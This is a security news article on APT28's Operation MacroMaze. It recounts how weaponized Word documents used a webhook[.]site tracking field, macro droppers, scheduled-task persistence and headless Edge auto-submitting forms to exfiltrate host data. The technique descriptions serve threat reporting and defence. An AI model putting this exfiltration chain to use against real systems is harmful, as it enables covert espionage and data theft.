Operation MacroMaze: APT28 exploits webhooks for covert data exfiltration

Russia-linked APT28 targeted European entities with a webhook-based macro malware campaign called Operation MacroMaze.

Russia-linked APT28 (aka UAC-0001, aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) launched Operation MacroMaze, targeting select entities in Western and Central Europe from September 2025 to January 2026. The campaign used webhook-based macro malware, leveraging simple tools and legitimate services for infrastructure and data exfiltration.

The attack chain campaign begins with spear-phishing emails delivering weaponized documents that contain an “INCLUDEPICTURE” field pointing to a webhook[.]site URL hosting a JPG.

“All analyzed documents share a common structural element within their XML: an INCLUDEPICTURE field referencing a remote URL hosted on webhook[.]site.” reads the report published by S2 Grupo’s LAB52 threat intelligence team. “This field is embedded in the document’s XML (w:instrText) and instructs Microsoft Word to retrieve an external image resource when the field is evaluated. The referenced file (docopened.jpg) is fetched from the remote server when the document is opened and fields are updated. This behavior functions as a tracking mechanism: when the document is opened and Word processes the INCLUDEPICTURE field, an outbound HTTP request is generated to the remote server. The server operator can then log metadata associated with the request, effectively confirming that the document has been opened.”

When opened, the file silently retrieves the image, acting like a tracking pixel that alerts attackers the document was viewed. Variants seen between September 2025 and January 2026 use modified macros to drop malware and deploy additional payloads on compromised systems.

Researchers identified four closely related macro variants acting as droppers. Each drops six files (VBS, BAT, CMD, HTM, XHTML) into the %USERPROFILE% folder using GUID-like names tied to a webhook[.]site C2 path. The attackers used heavy string concatenation to hide key commands. The macro launches a VBScript that triggers multi-stage execution, creates a Scheduled Task for persistence, then deletes traces. Over time, the variants evolved from simple document cleanup to fake Word error messages and SendKeys-based UI manipulation to bypass security prompts. Two batch versions follow: one uses Edge in headless mode for stealth, the other hides the browser off-screen and forcefully kills processes for reliability, suppressing certificate errors.

“The final HTML file is constructed by concatenating a static HTM file, the captured output of the reconstructed CMD payload, and a closing XHTML template. The initial HTM file defines an auto-submitting form that sends a POST request to a webhook[.]site endpoint, while the payload output is embedded directly within a element. The closing XHTML fragment completes the document structure.” continues the report. “When the resulting HTML file is rendered by Microsoft Edge, the form is submitted, causing the collected command output to be exfiltrated to the remote webhook endpoint without user interaction.”

The Operation MacroMaze campaign uses a browser-based exfiltration method that relies on standard HTML features to send stolen data while leaving minimal traces on disk. Although the specific command file used to gather system data was not recovered, similar operations previously attributed to APT28 by CERT Polska and the Computer Emergency Response Team of Ukraine suggest this stage likely deploys a lightweight reconnaissance script, collecting basic host details such as IP address, directory listings, and system environment information before exfiltration.

“This campaign proves that simplicity can be powerful. The attacker uses very basic tools (batch files, tiny VBS launchers and simple HTML) but arranges them with care to maximise stealth.” concludes the report. “The tooling may be unsophisticated, but the operational tradeoffs are effective. It’s low-tech executed with high craft, which makes detection and attribution harder than the artifacts alone would suggest.”

The APT28 group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

The group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).

In January 2026, Zscaler ThreatLabz uncovered the campaign Operation Neusploit targeting Central and Eastern Europe. Threat actors targeted the vulnerability CVE-2026-21509, they used weaponized RTF files and localized lures to deploy MiniDoor, PixyNetLoader, and Covenant Grunt implants.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, APT28)